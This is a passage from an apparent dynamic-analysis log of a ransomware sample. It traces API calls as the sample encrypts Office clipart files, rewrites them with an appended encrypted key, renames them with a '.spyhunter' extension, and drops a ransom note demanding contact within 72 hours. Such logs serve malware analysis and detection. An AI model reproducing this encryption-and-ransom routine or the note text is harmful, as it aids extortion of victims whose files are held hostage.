"c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.spyhunter")) returned 1 [0098.864] GetProcessHeap () returned 0x2c0000 [0098.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0098.864] GetProcessHeap () returned 0x2c0000 [0098.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.864] GetProcessHeap () returned 0x2c0000 [0098.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ea30 | out: hHeap=0x2c0000) returned 1 [0098.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.864] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0098.864] WriteFile (in: hFile=0x178, lpBuffer=0x248fbd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fd00, lpOverlapped=0x0 | out: lpBuffer=0x248fbd7*, lpNumberOfBytesWritten=0x248fd00*=0x127, lpOverlapped=0x0) returned 1 [0098.865] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0098.865] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fd00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fd00*=0x2ac, lpOverlapped=0x0) returned 1 [0098.865] CloseHandle (hObject=0x178) returned 1 [0098.866] GetProcessHeap () returned 0x2c0000 [0098.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0098.866] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fca0 | out: pbBuffer=0x248fca0) returned 1 [0098.866] GetProcessHeap () returned 0x2c0000 [0098.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.866] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc98*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc98*=0x30) returned 1 [0098.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.867] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF") returned 64 [0098.867] StrStrW (lpFirst="WING2.WMF", lpSrch=".txt") returned 0x0 [0098.867] GetProcessHeap () returned 0x2c0000 [0098.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.867] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc5c*=0x976, lpOverlapped=0x0) returned 1 [0098.903] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.903] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x976, lpNumberOfBytesWritten=0x248fc5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc5c*=0x976, lpOverlapped=0x0) returned 1 [0098.903] GetProcessHeap () returned 0x2c0000 [0098.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.903] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.903] WriteFile (in: hFile=0x178, lpBuffer=0x248fc9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc5c, lpOverlapped=0x0 | out: lpBuffer=0x248fc9c*, lpNumberOfBytesWritten=0x248fc5c*=0x4, lpOverlapped=0x0) returned 1 [0098.903] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc5c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc5c*=0x30, lpOverlapped=0x0) returned 1 [0098.903] CloseHandle (hObject=0x178) returned 1 [0098.903] GetProcessHeap () returned 0x2c0000 [0098.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0098.904] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF.spyhunter") returned 74 [0098.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf.spyhunter")) returned 1 [0098.904] GetProcessHeap () returned 0x2c0000 [0098.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0098.904] GetProcessHeap () returned 0x2c0000 [0098.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.904] GetProcessHeap () returned 0x2c0000 [0098.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e960 | out: hHeap=0x2c0000) returned 1 [0098.904] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc98 | out: pbBuffer=0x248fc98) returned 1 [0098.904] GetProcessHeap () returned 0x2c0000 [0098.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.904] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc90*=0x30) returned 1 [0098.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02218_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0098.942] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF") returned 80 [0098.942] StrStrW (lpFirst="WB02218_.GIF", lpSrch=".txt") returned 0x0 [0098.942] GetProcessHeap () returned 0x2c0000 [0098.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.942] ReadFile (in: hFile=0xcc, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc54*=0xbc4, lpOverlapped=0x0) returned 1 [0098.999] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffff43c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.999] WriteFile (in: hFile=0xcc, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xbc4, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc54*=0xbc4, lpOverlapped=0x0) returned 1 [0098.999] GetProcessHeap () returned 0x2c0000 [0098.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.999] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.999] WriteFile (in: hFile=0xcc, lpBuffer=0x248fc94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x248fc94*, lpNumberOfBytesWritten=0x248fc54*=0x4, lpOverlapped=0x0) returned 1 [0098.999] WriteFile (in: hFile=0xcc, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc54*=0x30, lpOverlapped=0x0) returned 1 [0098.999] CloseHandle (hObject=0xcc) returned 1 [0099.055] GetProcessHeap () returned 0x2c0000 [0099.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.055] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.spyhunter") returned 90 [0099.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02218_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02218_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02218_.gif.spyhunter")) returned 1 [0099.081] GetProcessHeap () returned 0x2c0000 [0099.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.081] GetProcessHeap () returned 0x2c0000 [0099.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.082] GetProcessHeap () returned 0x2c0000 [0099.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352f38 | out: hHeap=0x2c0000) returned 1 [0099.082] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc98 | out: pbBuffer=0x248fc98) returned 1 [0099.082] GetProcessHeap () returned 0x2c0000 [0099.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0099.082] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc90*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc90*=0x30) returned 1 [0099.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02187_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF") returned 80 [0099.082] StrStrW (lpFirst="WB02187_.GIF", lpSrch=".txt") returned 0x0 [0099.082] GetProcessHeap () returned 0x2c0000 [0099.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0099.082] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc54*=0x579, lpOverlapped=0x0) returned 1 [0099.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffa87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.132] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x579, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc54*=0x579, lpOverlapped=0x0) returned 1 [0099.132] GetProcessHeap () returned 0x2c0000 [0099.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0099.132] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.132] WriteFile (in: hFile=0x154, lpBuffer=0x248fc94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x248fc94*, lpNumberOfBytesWritten=0x248fc54*=0x4, lpOverlapped=0x0) returned 1 [0099.132] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc54, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc54*=0x30, lpOverlapped=0x0) returned 1 [0099.132] CloseHandle (hObject=0x154) returned 1 [0099.132] GetProcessHeap () returned 0x2c0000 [0099.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.132] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.spyhunter") returned 90 [0099.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02187_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02187_.gif.spyhunter")) returned 1 [0099.133] GetProcessHeap () returned 0x2c0000 [0099.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.133] GetProcessHeap () returned 0x2c0000 [0099.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.133] GetProcessHeap () returned 0x2c0000 [0099.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352b78 | out: hHeap=0x2c0000) returned 1 [0099.133] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc90 | out: pbBuffer=0x248fc90) returned 1 [0099.133] GetProcessHeap () returned 0x2c0000 [0099.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0099.133] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc88*=0x30) returned 1 [0099.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02116_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.134] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF") returned 80 [0099.134] StrStrW (lpFirst="WB02116_.GIF", lpSrch=".txt") returned 0x0 [0099.134] GetProcessHeap () returned 0x2c0000 [0099.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0099.134] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc4c*=0x3ef, lpOverlapped=0x0) returned 1 [0099.216] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffc11, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.216] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3ef, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc4c*=0x3ef, lpOverlapped=0x0) returned 1 [0099.216] GetProcessHeap () returned 0x2c0000 [0099.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0099.216] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.216] WriteFile (in: hFile=0x154, lpBuffer=0x248fc8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x248fc8c*, lpNumberOfBytesWritten=0x248fc4c*=0x4, lpOverlapped=0x0) returned 1 [0099.216] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc4c*=0x30, lpOverlapped=0x0) returned 1 [0099.216] CloseHandle (hObject=0x154) returned 1 [0099.216] GetProcessHeap () returned 0x2c0000 [0099.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.216] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.spyhunter") returned 90 [0099.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02116_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02116_.gif.spyhunter")) returned 1 [0099.217] GetProcessHeap () returned 0x2c0000 [0099.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.217] GetProcessHeap () returned 0x2c0000 [0099.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.217] GetProcessHeap () returned 0x2c0000 [0099.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352998 | out: hHeap=0x2c0000) returned 1 [0099.218] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc90 | out: pbBuffer=0x248fc90) returned 1 [0099.218] GetProcessHeap () returned 0x2c0000 [0099.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0099.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc88*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc88*=0x30) returned 1 [0099.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02085_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF") returned 80 [0099.218] StrStrW (lpFirst="WB02085_.GIF", lpSrch=".txt") returned 0x0 [0099.218] GetProcessHeap () returned 0x2c0000 [0099.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0099.218] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc4c*=0x90c, lpOverlapped=0x0) returned 1 [0099.223] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff6f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.223] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x90c, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc4c*=0x90c, lpOverlapped=0x0) returned 1 [0099.224] GetProcessHeap () returned 0x2c0000 [0099.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0099.224] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.224] WriteFile (in: hFile=0x154, lpBuffer=0x248fc8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x248fc8c*, lpNumberOfBytesWritten=0x248fc4c*=0x4, lpOverlapped=0x0) returned 1 [0099.224] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc4c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc4c*=0x30, lpOverlapped=0x0) returned 1 [0099.224] CloseHandle (hObject=0x154) returned 1 [0099.225] GetProcessHeap () returned 0x2c0000 [0099.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0099.226] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.spyhunter") returned 90 [0099.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02085_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02085_.gif.spyhunter")) returned 1 [0099.226] GetProcessHeap () returned 0x2c0000 [0099.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0099.226] GetProcessHeap () returned 0x2c0000 [0099.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0099.226] GetProcessHeap () returned 0x2c0000 [0099.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3526c8 | out: hHeap=0x2c0000) returned 1 [0099.227] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc88 | out: pbBuffer=0x248fc88) returned 1 [0099.227] GetProcessHeap () returned 0x2c0000 [0099.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0099.227] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc80*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc80*=0x30) returned 1 [0099.227] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02077_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0099.227] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02077_.GIF") returned 80 [0099.227] StrStrW (lpFirst="WB02077_.GIF", lpSrch=".txt") returned 0x0 [0099.227] GetProcessHeap () returned 0x2c0000 [0099.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.227] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc44*=0x2fd, lpOverlapped=0x0) returned 1 [0099.695] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffd03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.695] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x248fc44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc44*=0x2fd, lpOverlapped=0x0) returned 1 [0099.695] GetProcessHeap () returned 0x2c0000 [0099.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0099.695] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.695] 